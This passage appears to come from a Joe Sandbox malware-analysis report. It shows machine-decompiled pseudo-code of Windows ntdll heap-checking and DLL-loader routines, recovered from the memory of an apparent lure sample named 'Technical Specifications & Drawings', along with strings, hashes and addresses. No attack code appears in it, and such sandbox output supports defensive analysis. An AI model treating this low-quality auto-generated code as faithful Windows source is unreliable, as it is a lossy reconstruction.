                                                  								_t212 =  *[fs:0x30];
                                                  								__eflags =  *(_t212 + 0xc);
                                                  								if( *(_t212 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_push(_t331[0x1d]);
                                                  								_push(_v36);
                                                  								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                  								L58:
                                                  								E017AB150();
                                                  								goto L59;
                                                  							}
                                                  							_t220 =  *[fs:0x30];
                                                  							__eflags =  *(_t220 + 0xc);
                                                  							if( *(_t220 + 0xc) == 0) {
                                                  								_push("HEAP: ");
                                                  								E017AB150();
                                                  							} else {
                                                  								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  							}
                                                  							_push(_t328);
                                                  							_push(_v24);
                                                  							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                  							goto L58;
                                                  						} else {
                                                  							goto L50;
                                                  						}
                                                  						while(1) {
                                                  							L50:
                                                  							_t92 = _t327 - 0x10; // -24
                                                  							_t282 = _t331;
                                                  							_t230 = E01864AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                  							__eflags = _t230;
                                                  							if(_t230 == 0) {
                                                  								goto L59;
                                                  							}
                                                  							_t327 =  *_t327;
                                                  							__eflags = _t327 - _t261;
                                                  							if(_t327 != _t261) {
                                                  								continue;
                                                  							}
                                                  							_t184 = _v24;
                                                  							_t282 = _v36;
                                                  							goto L53;
                                                  						}
                                                  						goto L59;
                                                  					} else {
                                                  						while(1) {
                                                  							_t39 = _t326 + 0x18; // 0x10
                                                  							_t264 = _t39;
                                                  							if(_t331[0x13] != 0) {
                                                  								_t319 = _t331[0x14] ^  *_t264;
                                                  								 *_t264 = _t319;
                                                  								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                  								_t348 = _t319 >> 0x18 - _t303;
                                                  								if(_t319 >> 0x18 != _t303) {
                                                  									_push(_t303);
                                                  									E0185FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                  								}
                                                  								_t281 = 0x81;
                                                  							}
                                                  							_t317 = _v20;
                                                  							if(_t317 != 0) {
                                                  								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                  								_t350 = _t241;
                                                  								if(_t350 != 0) {
                                                  									if(_t350 >= 0) {
                                                  										__eflags = _t241 & 0x00000800;
                                                  										if(__eflags == 0) {
                                                  											__eflags = _t241 - _t331[0x21];
                                                  											if(__eflags < 0) {
                                                  												_t298 = _t241;
                                                  												_t65 = _t317 + _t298 * 4;
                                                  												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                  												__eflags =  *_t65;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t244 = _t241 & 0x00007fff;
                                                  										if(_t244 < _t281) {
                                                  											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E018523E3(_t331, _t264) == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t331[0x13] != 0) {
                                                  								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                  								 *_t264 =  *_t264 ^ _t331[0x14];
                                                  							}
                                                  							_t326 =  *_t326;
                                                  							if( &(_t331[0x27]) == _t326) {
                                                  								goto L49;
                                                  							} else {
                                                  								_t281 = 0x81;
                                                  								continue;
                                                  							}
                                                  						}
                                                  						__eflags = _t331[0x13];
                                                  						if(_t331[0x13] != 0) {
                                                  							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                  							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                  						}
                                                  						goto L65;
                                                  					}
                                                  				} else {
                                                  					L83:
                                                  					return _t267;
                                                  				}
                                                  			}



























































                                                  0x0186462e
                                                  0x0186461d
                                                  0x0186460f
                                                  0x01864609
                                                  0x018646fd
                                                  0x00000000
                                                  0x00000000
                                                  0x01864710
                                                  0x0186471a
                                                  0x01864720
                                                  0x01864720
                                                  0x01864722
                                                  0x0186472c
                                                  0x00000000
                                                  0x0186472e
                                                  0x0186472e
                                                  0x00000000
                                                  0x0186472e
                                                  0x0186472c
                                                  0x01864738
                                                  0x0186473c
                                                  0x0186474b
                                                  0x01864751
                                                  0x01864751
                                                  0x00000000
                                                  0x0186473c
                                                  0x018648f4
                                                  0x018648f4
                                                  0x00000000
                                                  0x018648f4

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                  • API String ID: 0-1357697941
                                                  • Opcode ID: 07ed406b45f78e3022b847b2dfee71fef071da7fc8362b1852eef20ba4380ffc
                                                  • Instruction ID: 77e53e6ef560c13abbe6cbb29bf52a136730a1398401fb1c436bdab9cedfaa90
                                                  • Opcode Fuzzy Hash: 07ed406b45f78e3022b847b2dfee71fef071da7fc8362b1852eef20ba4380ffc
                                                  • Instruction Fuzzy Hash: 4EF1203160064AEFDB25DF69C484BAEFBF9FF49304F18812AE146DB641C734AA85CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 44%
                                                  			E017D8E00(void* __ecx) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t43;
                                                  				void* _t46;
                                                  				intOrPtr _t47;
                                                  				void* _t48;
                                                  				signed int _t49;
                                                  				void* _t50;
                                                  				intOrPtr* _t51;
                                                  				signed int _t52;
                                                  				void* _t53;
                                                  				intOrPtr _t55;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t52;
                                                  				_t49 = 0;
                                                  				_t48 = __ecx;
                                                  				_t55 =  *0x1898464; // 0x761c0110
                                                  				if(_t55 == 0) {
                                                  					L9:
                                                  					if( !_t49 >= 0) {
                                                  						if(( *0x1895780 & 0x00000003) != 0) {
                                                  							E01825510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                  						}
                                                  						if(( *0x1895780 & 0x00000010) != 0) {
                                                  							asm("int3");
                                                  						}
                                                  					}
                                                  					return E017EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                  				}
                                                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                  				_t43 =  *0x1897984; // 0x1262b90
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                  					if(_t48 == _t43) {
                                                  						_t50 = 0x5c;
                                                  						if( *_t32 == _t50) {
                                                  							_t46 = 0x3f;
                                                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                  								_t32 = _t32 + 8;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t51 =  *0x1898464; // 0x761c0110
                                                  					 *0x189b1e0(_t47, _t32,  &_v12);
                                                  					_t49 =  *_t51();
                                                  					if(_t49 >= 0) {
                                                  						L8:
                                                  						_t35 = _v12;
                                                  						if(_t35 != 0) {
                                                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                  								E017D9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                  								_t35 = _v12;
                                                  							}
                                                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                  						}
                                                  						goto L9;
                                                  					}
                                                  					if(_t49 != 0xc000008a) {
                                                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                  							if(_t49 != 0xc00000bb) {
                                                  								goto L8;
                                                  							}
                                                  						}
                                                  					}
                                                  					if(( *0x1895780 & 0x00000005) != 0) {
                                                  						_push(_t49);
                                                  						E01825510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                  						_t53 = _t53 + 0x1c;
                                                  					}
                                                  					_t49 = 0;
                                                  					goto L8;
                                                  				} else {
                                                  					goto L9;
                                                  				}
                                                  			}





















                                                  APIs
                                                  Strings
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01819357
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0181932A
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0181933B, 01819367
                                                  • LdrpFindDllActivationContext, xrefs: 01819331, 0181935D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                  • Instruction ID: d7a02f92a7c4ed64a13030f36747a8d40bb3e1b05906b47a598ed36abd608f1a
                                                  • Opcode Fuzzy Hash: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                  • Instruction Fuzzy Hash: 47412C72A4031DAFDB366A1CCC99A79F7B4BB09718F094569E50497151E7709E808FC3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E017CA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                  				char _v8;
                                                  				signed short _v12;
                                                  				signed short _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed short _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				unsigned int _v52;
                                                  				signed int _v56;
                                                  				void* _v60;
                                                  				intOrPtr _v64;
                                                  				void* _v72;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __ebp;
                                                  				unsigned int _t246;
                                                  				signed char _t247;
                                                  				signed short _t249;
                                                  				unsigned int _t256;
                                                  				signed int _t262;
                                                  				signed int _t265;
                                                  				signed int _t266;
                                                  				signed int _t267;
                                                  				intOrPtr _t270;
                                                  				signed int _t280;
                                                  				signed int _t286;
                                                  				signed int _t289;
                                                  				intOrPtr _t290;
                                                  				signed int _t291;
                                                  				signed int _t317;
                                                  				signed short _t320;
                                                  				intOrPtr _t327;
                                                  				signed int _t339;
                                                  				signed int _t344;
                                                  				signed int _t347;
                                                  				intOrPtr _t348;
                                                  				signed int _t350;
                                                  				signed int _t352;
                                                  				signed int _t353;
                                                  				signed int _t356;
                                                  				intOrPtr _t357;
                                                  				intOrPtr _t366;
                                                  				signed int _t367;
                                                  				signed int _t370;
                                                  				intOrPtr _t371;
                                                  				signed int _t372;
                                                  				signed int _t394;
                                                  				signed short _t402;
                                                  				intOrPtr _t404;
                                                  				intOrPtr _t415;
                                                  				signed int _t430;
                                                  				signed int _t433;
                                                  				signed int _t437;
                                                  				signed int _t445;
                                                  				signed short _t446;
                                                  				signed short _t449;
                                                  				signed short _t452;
                                                  				signed int _t455;
                                                  				signed int _t460;
                                                  				signed short* _t468;
                                                  				signed int _t480;
                                                  				signed int _t481;
                                                  				signed int _t483;
                                                  				intOrPtr _t484;
                                                  				signed int _t491;
                                                  				unsigned int _t506;
                                                  				unsigned int _t508;
                                                  				signed int _t513;
                                                  				signed int _t514;
                                                  				signed int _t521;
                                                  				signed short* _t533;
                                                  				signed int _t541;
                                                  				signed int _t543;
                                                  				signed int _t546;
                                                  				unsigned int _t551;
                                                  				signed int _t553;
                                                  
                                                  				_t450 = __ecx;
                                                  				_t553 = __ecx;
                                                  				_t539 = __edx;
                                                  				_v28 = 0;
                                                  				_v40 = 0;
                                                  				if(( *(__ecx + 0xcc) ^  *0x1898a68) != 0) {
                                                  					_push(_a4);
                                                  					_t513 = __edx;
                                                  					L11:
                                                  					_t246 = E017CA830(_t450, _t513);
                                                  					L7:
                                                  					return _t246;
                                                  				}
                                                  				if(_a8 != 0) {
                                                  					__eflags =  *(__edx + 2) & 0x00000008;
                                                  					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                  						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                  						_t430 = E017CDF24(__edx,  &_v12,  &_v16);
                                                  						__eflags = _t430;
                                                  						if(_t430 != 0) {
                                                  							_t157 = _t553 + 0x234;
                                                  							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                  							__eflags =  *_t157;
                                                  						}
                                                  					}
                                                  					_t445 = _a4;
                                                  					_t514 = _t539;
                                                  					_v48 = _t539;
                                                  					L14:
                                                  					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                  					__eflags = _t247;
                                                  					if(_t247 == 0) {
                                                  						_t541 = _t553;
                                                  					} else {
                                                  						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                  						__eflags = _t541;
                                                  					}
                                                  					_t249 = 7 + _t445 * 8 + _t514;
                                                  					_v12 = _t249;
                                                  					__eflags =  *_t249 - 3;
                                                  					if( *_t249 == 3) {
                                                  						_v16 = _t514 + _t445 * 8 + 8;
                                                  						E017A9373(_t553, _t514 + _t445 * 8 + 8);
                                                  						_t452 = _v16;
                                                  						_v28 =  *(_t452 + 0x10);
                                                  						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                  						_v36 =  *(_t452 + 0x14);
                                                  						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                  						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                  						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                  						_t256 =  *(_t452 + 0x14);
                                                  						__eflags = _t256 - 0x7f000;
                                                  						if(_t256 >= 0x7f000) {
                                                  							_t142 = _t553 + 0x1ec;
                                                  							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                  							__eflags =  *_t142;
                                                  							_t256 =  *(_t452 + 0x14);
                                                  						}
                                                  						_t513 = _v48;
                                                  						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                  						_a4 = _t445;
                                                  						_v40 = 1;
                                                  					} else {
                                                  						_t27 =  &_v36;
                                                  						 *_t27 = _v36 & 0x00000000;
                                                  						__eflags =  *_t27;
                                                  					}
                                                  					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                  					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                  						_v44 = _t513;
                                                  						_t262 = E017AA9EF(_t541, _t513);
                                                  						__eflags = _a8;
                                                  						_v32 = _t262;
                                                  						if(_a8 != 0) {
                                                  							__eflags = _t262;
                                                  							if(_t262 == 0) {
                                                  								goto L19;
                                                  							}
                                                  						}
                                                  						__eflags =  *0x1898748 - 1;
                                                  						if( *0x1898748 >= 1) {
                                                  							__eflags = _t262;
                                                  							if(_t262 == 0) {
                                                  								_t415 =  *[fs:0x30];
                                                  								__eflags =  *(_t415 + 0xc);
                                                  								if( *(_t415 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_push("(UCRBlock != NULL)");
                                                  								E017AB150();
                                                  								__eflags =  *0x1897bc8;
                                                  								if( *0x1897bc8 == 0) {
                                                  									__eflags = 1;
                                                  									E01862073(_t445, 1, _t541, 1);
                                                  								}
                                                  								_t513 = _v48;
                                                  								_t445 = _a4;
                                                  							}
                                                  						}
                                                  						_t350 = _v40;
                                                  						_t480 = _t445 << 3;
                                                  						_v20 = _t480;
                                                  						_t481 = _t480 + _t513;
                                                  						_v24 = _t481;
                                                  						__eflags = _t350;
                                                  						if(_t350 == 0) {
                                                  							_t481 = _t481 + 0xfffffff0;
                                                  							__eflags = _t481;
                                                  						}
                                                  						_t483 = (_t481 & 0xfffff000) - _v44;
                                                  						__eflags = _t483;
                                                  						_v52 = _t483;
                                                  						if(_t483 == 0) {
                                                  							__eflags =  *0x1898748 - 1;
                                                  							if( *0x1898748 < 1) {
                                                  								goto L9;
                                                  							}
                                                  							__eflags = _t350;
                                                  							goto L146;
                                                  						} else {
                                                  							_t352 = E017D174B( &_v44,  &_v52, 0x4000);
                                                  							__eflags = _t352;
                                                  							if(_t352 < 0) {
                                                  								goto L94;
                                                  							}
                                                  							_t353 = E017C7D50();
                                                  							_t447 = 0x7ffe0380;
                                                  							__eflags = _t353;
                                                  							if(_t353 != 0) {
                                                  								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  							} else {
                                                  								_t356 = 0x7ffe0380;
                                                  							}
                                                  							__eflags =  *_t356;
                                                  							if( *_t356 != 0) {
                                                  								_t357 =  *[fs:0x30];
                                                  								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                  								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                  									E018614FB(_t447, _t553, _v44, _v52, 5);
                                                  								}
                                                  							}
                                                  							_t358 = _v32;
                                                  							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                  							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                  							__eflags = _t484 - 0x7f000;
                                                  							if(_t484 >= 0x7f000) {
                                                  								_t90 = _t553 + 0x1ec;
                                                  								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                  								__eflags =  *_t90;
                                                  							}
                                                  							E017A9373(_t553, _t358);
                                                  							_t486 = _v32;
                                                  							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                  							E017A9819(_t486);
                                                  							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                  							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                  							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                  							__eflags = _t366 - 0x7f000;
                                                  							if(_t366 >= 0x7f000) {
                                                  								_t104 = _t553 + 0x1ec;
                                                  								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                  								__eflags =  *_t104;
                                                  							}
                                                  							__eflags = _v40;
                                                  							if(_v40 == 0) {
                                                  								_t533 = _v52 + _v44;
                                                  								_v32 = _t533;
                                                  								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                  								__eflags = _v24 - _v52 + _v44;
                                                  								if(_v24 == _v52 + _v44) {
                                                  									__eflags =  *(_t553 + 0x4c);
                                                  									if( *(_t553 + 0x4c) != 0) {
                                                  										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                  										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                  									}
                                                  								} else {
                                                  									_t449 = 0;
                                                  									_t533[3] = 0;
                                                  									_t533[1] = 0;
                                                  									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                  									_t491 = _t394;
                                                  									 *_t533 = _t394;
                                                  									__eflags =  *0x1898748 - 1; // 0x0
                                                  									if(__eflags >= 0) {
                                                  										__eflags = _t491 - 1;
                                                  										if(_t491 <= 1) {
                                                  											_t404 =  *[fs:0x30];
                                                  											__eflags =  *(_t404 + 0xc);
                                                  											if( *(_t404 + 0xc) == 0) {
                                                  												_push("HEAP: ");
                                                  												E017AB150();
                                                  											} else {
                                                  												E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  											}
                                                  											_push("((LONG)FreeEntry->Size > 1)");
                                                  											E017AB150();
                                                  											_pop(_t491);
                                                  											__eflags =  *0x1897bc8 - _t449; // 0x0
                                                  											if(__eflags == 0) {
                                                  												__eflags = 0;
                                                  												_t491 = 1;
                                                  												E01862073(_t449, 1, _t541, 0);
                                                  											}
                                                  											_t533 = _v32;
                                                  										}
                                                  									}
                                                  									_t533[1] = _t449;
                                                  									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                  									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                  										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                  										_v16 = _t402;
                                                  										__eflags = _t402 - 0xfe;
                                                  										if(_t402 >= 0xfe) {
                                                  											_push(_t491);
                                                  											_push(_t449);
                                                  											E0186A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                  											_t533 = _v48;
                                                  											_t402 = _v32;
                                                  										}
                                                  										_t449 = _t402;
                                                  									}
                                                  									_t533[3] = _t449;
                                                  									E017CA830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                  									_t447 = 0x7ffe0380;
                                                  								}
                                                  							}
                                                  							_t367 = E017C7D50();
                                                  							__eflags = _t367;
                                                  							if(_t367 != 0) {
                                                  								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  							} else {
                                                  								_t370 = _t447;
                                                  							}
                                                  							__eflags =  *_t370;
                                                  							if( *_t370 != 0) {
                                                  								_t371 =  *[fs:0x30];
                                                  								__eflags =  *(_t371 + 0x240) & 1;
                                                  								if(( *(_t371 + 0x240) & 1) != 0) {
                                                  									__eflags = E017C7D50();
                                                  									if(__eflags != 0) {
                                                  										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  									}
                                                  									E01861411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                  								}
                                                  							}
                                                  							_t372 = E017C7D50();
                                                  							_t546 = 0x7ffe038a;
                                                  							_t446 = 0x230;
                                                  							__eflags = _t372;
                                                  							if(_t372 != 0) {
                                                  								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                  							} else {
                                                  								_t246 = 0x7ffe038a;
                                                  							}
                                                  							__eflags =  *_t246;
                                                  							if( *_t246 == 0) {
                                                  								goto L7;
                                                  							} else {
                                                  								__eflags = E017C7D50();
                                                  								if(__eflags != 0) {
                                                  									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                  									__eflags = _t546;
                                                  								}
                                                  								_push( *_t546 & 0x000000ff);
                                                  								_push(_v36);
                                                  								_push(_v40);
                                                  								goto L120;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						L19:
                                                  						_t31 = _t513 + 0x101f; // 0x101f
                                                  						_t455 = _t31 & 0xfffff000;
                                                  						_t32 = _t513 + 0x28; // 0x28
                                                  						_v44 = _t455;
                                                  						__eflags = _t455 - _t32;
                                                  						if(_t455 == _t32) {
                                                  							_t455 = _t455 + 0x1000;
                                                  							_v44 = _t455;
                                                  						}
                                                  						_t265 = _t445 << 3;
                                                  						_v24 = _t265;
                                                  						_t266 = _t265 + _t513;
                                                  						__eflags = _v40;
                                                  						_v20 = _t266;
                                                  						if(_v40 == 0) {
                                                  							_t266 = _t266 + 0xfffffff0;
                                                  							__eflags = _t266;
                                                  						}
                                                  						_t267 = _t266 & 0xfffff000;
                                                  						_v52 = _t267;
                                                  						__eflags = _t267 - _t455;
                                                  						if(_t267 < _t455) {
                                                  							__eflags =  *0x1898748 - 1; // 0x0
                                                  							if(__eflags < 0) {
                                                  								L9:
                                                  								_t450 = _t553;
                                                  								L10:
                                                  								_push(_t445);
                                                  								goto L11;
                                                  							}
                                                  							__eflags = _v40;
                                                  							L146:
                                                  							if(__eflags == 0) {
                                                  								goto L9;
                                                  							}
                                                  							_t270 =  *[fs:0x30];
                                                  							__eflags =  *(_t270 + 0xc);
                                                  							if( *(_t270 + 0xc) == 0) {
                                                  								_push("HEAP: ");
                                                  								E017AB150();
                                                  							} else {
                                                  								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  							}
                                                  							_push("(!TrailingUCR)");
                                                  							E017AB150();
                                                  							__eflags =  *0x1897bc8;
                                                  							if( *0x1897bc8 == 0) {
                                                  								__eflags = 0;
                                                  								E01862073(_t445, 1, _t541, 0);
                                                  							}
                                                  							L152:
                                                  							_t445 = _a4;
                                                  							L153:
                                                  							_t513 = _v48;
                                                  							goto L9;
                                                  						}
                                                  						_v32 = _t267;
                                                  						_t280 = _t267 - _t455;
                                                  						_v32 = _v32 - _t455;
                                                  						__eflags = _a8;
                                                  						_t460 = _v32;
                                                  						_v52 = _t460;
                                                  						if(_a8 != 0) {
                                                  							L27:
                                                  							__eflags = _t280;
                                                  							if(_t280 == 0) {
                                                  								L33:
                                                  								_t446 = 0;
                                                  								__eflags = _v40;
                                                  								if(_v40 == 0) {
                                                  									_t468 = _v44 + _v52;
                                                  									_v36 = _t468;
                                                  									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                  									__eflags = _v20 - _v52 + _v44;
                                                  									if(_v20 == _v52 + _v44) {
                                                  										__eflags =  *(_t553 + 0x4c);
                                                  										if( *(_t553 + 0x4c) != 0) {
                                                  											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                  											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                  										}
                                                  									} else {
                                                  										_t468[3] = 0;
                                                  										_t468[1] = 0;
                                                  										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                  										_t521 = _t317;
                                                  										 *_t468 = _t317;
                                                  										__eflags =  *0x1898748 - 1; // 0x0
                                                  										if(__eflags >= 0) {
                                                  											__eflags = _t521 - 1;
                                                  											if(_t521 <= 1) {
                                                  												_t327 =  *[fs:0x30];
                                                  												__eflags =  *(_t327 + 0xc);
                                                  												if( *(_t327 + 0xc) == 0) {
                                                  													_push("HEAP: ");
                                                  													E017AB150();
                                                  												} else {
                                                  													E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  												}
                                                  												_push("(LONG)FreeEntry->Size > 1");
                                                  												E017AB150();
                                                  												__eflags =  *0x1897bc8 - _t446; // 0x0
                                                  												if(__eflags == 0) {
                                                  													__eflags = 1;
                                                  													E01862073(_t446, 1, _t541, 1);
                                                  												}
                                                  												_t468 = _v36;
                                                  											}
                                                  										}
                                                  										_t468[1] = _t446;
                                                  										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                  										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                  										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                  											_t320 = _t446;
                                                  										} else {
                                                  											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                  											_v12 = _t320;
                                                  											__eflags = _t320 - 0xfe;
                                                  											if(_t320 >= 0xfe) {
                                                  												_push(_t468);
                                                  												_push(_t446);
                                                  												E0186A80D(_t522, 3, _t468, _t541);
                                                  												_t468 = _v52;
                                                  												_t320 = _v28;
                                                  											}
                                                  										}
                                                  										_t468[3] = _t320;
                                                  										E017CA830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                  									}
                                                  								}
